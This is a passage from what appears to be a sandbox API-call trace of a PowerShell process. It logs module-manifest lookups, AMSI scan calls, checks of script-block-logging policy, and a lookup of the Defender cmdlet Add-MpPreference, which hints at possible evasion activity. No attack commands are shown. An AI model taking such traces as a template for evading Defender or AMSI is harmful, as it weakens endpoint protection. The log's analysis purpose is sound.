"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1")) returned 0x20 [0273.123] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1")) returned 0x20 [0273.126] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0273.126] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1")) returned 0x20 [0273.126] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning\\Provisioning.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\provisioning\\provisioning.psd1")) returned 0x20 [0273.130] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1")) returned 0x20 [0273.131] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0273.131] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psm1")) returned 0x20 [0273.132] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0273.133] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1")) returned 0x20 [0273.197] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1")) returned 0x20 [0273.200] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0273.201] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0273.202] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0273.203] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0273.205] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0273.206] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0273.207] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1")) returned 0x20 [0273.208] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1")) returned 0x20 [0273.264] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1")) returned 0x20 [0273.269] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20 [0273.272] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1")) returned 0x20 [0273.276] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0273.277] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations\\ProcessMitigations.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\processmitigations\\processmitigations.psd1")) returned 0x20 [0273.287] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\UEV\\UEV.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\uev\\uev.psd1")) returned 0x20 [0273.290] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20 [0273.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1")) returned 0x20 [0273.562] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1")) returned 0x20 [0273.569] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0273.573] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1")) returned 0x20 [0273.577] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0273.577] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1")) returned 0x20 [0273.580] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.LocalAccounts\\1.0.0.0\\Microsoft.PowerShell.LocalAccounts.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.localaccounts\\1.0.0.0\\microsoft.powershell.localaccounts.psd1")) returned 0x20 [0273.581] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0273.581] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0273.584] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1")) returned 0x20 [0273.587] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory\\PersistentMemory.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\persistentmemory\\persistentmemory.psd1")) returned 0x20 [0273.589] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20 [0273.592] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1")) returned 0x20 [0273.592] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1")) returned 0x20 [0273.685] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0273.685] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1")) returned 0x20 [0273.688] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0273.689] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0273.689] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0273.690] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1")) returned 0x20 [0273.693] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0273.693] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1")) returned 0x20 [0273.694] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1")) returned 0x20 [0273.697] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0273.697] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0273.699] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0273.699] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0273.701] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0273.701] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1")) returned 0x20 [0273.704] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1")) returned 0x20 [0273.704] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0273.704] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20 [0273.707] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0273.707] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0273.708] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0273.708] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1")) returned 0x20 [0273.709] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0273.709] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0273.713] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0273.716] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0273.716] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1")) returned 0x20 [0273.717] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0273.718] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1")) returned 0x20 [0273.720] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0273.720] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0273.721] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0273.722] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0273.722] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1")) returned 0x20 Thread: id = 222 os_tid = 0x38c Thread: id = 223 os_tid = 0xeec Thread: id = 224 os_tid = 0x228 Thread: id = 225 os_tid = 0x844 [0301.237] CoUninitialize () Thread: id = 226 os_tid = 0x5a0 Thread: id = 227 os_tid = 0x194 [0312.874] CoGetContextToken (in: pToken=0x1ab6f700 | out: pToken=0x1ab6f700) returned 0x0 [0312.874] CObjectContext::QueryInterface () returned 0x0 [0312.874] CObjectContext::GetCurrentThreadType () returned 0x0 [0312.874] Release () returned 0x0 Thread: id = 228 os_tid = 0x6a4 Thread: id = 229 os_tid = 0xc58 Thread: id = 230 os_tid = 0x34 Thread: id = 239 os_tid = 0xa40 [0261.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0261.116] EtwEventRegister () returned 0x0 [0261.117] EtwEventSetInformation () returned 0x0 [0261.253] CoCreateGuid (in: pguid=0x1b83ef98 | out: pguid=0x1b83ef98*(Data1=0x276ea319, Data2=0x8391, Data3=0x4e90, Data4=([0]=0x90, [1]=0x25, [2]=0xcc, [3]=0xa, [4]=0xab, [5]=0xbc, [6]=0xbe, [7]=0x57))) returned 0x0 [0261.450] AmsiOpenSession () returned 0x0 [0261.450] AmsiScanBuffer () returned 0x80070015 [0261.549] RoGetParameterizedTypeInstanceIID () returned 0x0 [0261.549] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0261.549] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0261.661] CoCreateGuid (in: pguid=0x1b83d758 | out: pguid=0x1b83d758*(Data1=0x3107666c, Data2=0xa17, Data3=0x43c2, Data4=([0]=0xa0, [1]=0x8c, [2]=0x2c, [3]=0x58, [4]=0xc5, [5]=0x90, [6]=0x97, [7]=0xc9))) returned 0x0 [0262.023] EtwEventRegister () returned 0x0 [0262.024] EtwEventSetInformation () returned 0x0 [0262.025] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83ecb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.121] EtwEventActivityIdControl () returned 0x0 [0262.122] EtwEventActivityIdControl () returned 0x0 [0262.122] EtwEventActivityIdControl () returned 0x0 [0262.128] EtwEventActivityIdControl () returned 0x0 [0262.128] EtwEventActivityIdControl () returned 0x0 [0262.128] EtwEventActivityIdControl () returned 0x0 [0262.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83dba0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83dba0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83dbc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.371] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ed18 | out: phkResult=0x1b83ed18*=0x0) returned 0x2 [0262.371] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ed18 | out: phkResult=0x1b83ed18*=0x0) returned 0x2 [0262.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83db70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.627] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83e680, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b83e4e0, nSize=0x80 | out: lpBuffer="") returned 0xf1 [0262.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b83e400, nSize=0xf1 | out: lpBuffer="") returned 0xf0 [0262.632] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b83e3c0, nSize=0xf1 | out: lpBuffer="") returned 0x3a [0262.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a83e800 | out: lpBuffer="C:\\Users\\OqXZRaykm\\Desktop") returned 0x1a [0262.648] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b83e3c0, nSize=0xf1 | out: lpBuffer="") returned 0x3a [0262.650] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x104, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0262.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.651] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xb7b90b2d, ftCreationTime.dwHighDateTime=0x1d94216, ftLastAccessTime.dwLowDateTime=0xb7b90b2d, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0xb7b90b2d, ftLastWriteTime.dwHighDateTime=0x1d94216, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0262.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.653] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0262.653] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0262.654] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Add-MpPreference.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\add-mppreference.*"), lpFindFileData=0x1b83e3c0 | out: lpFindFileData=0x1b83e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0262.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e2e8) returned 1 [0262.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e4f8) returned 1 [0262.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b83d3e0, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0262.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0262.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0262.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e388) returned 1 [0262.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6b0 | out: lpFileInformation=0x1b83e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a6eea36, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x185cabf5, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xceac89c9, ftLastWriteTime.dwHighDateTime=0x1d9a995, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0262.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e338) returned 1 [0262.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e618) returned 1 [0262.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0262.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: 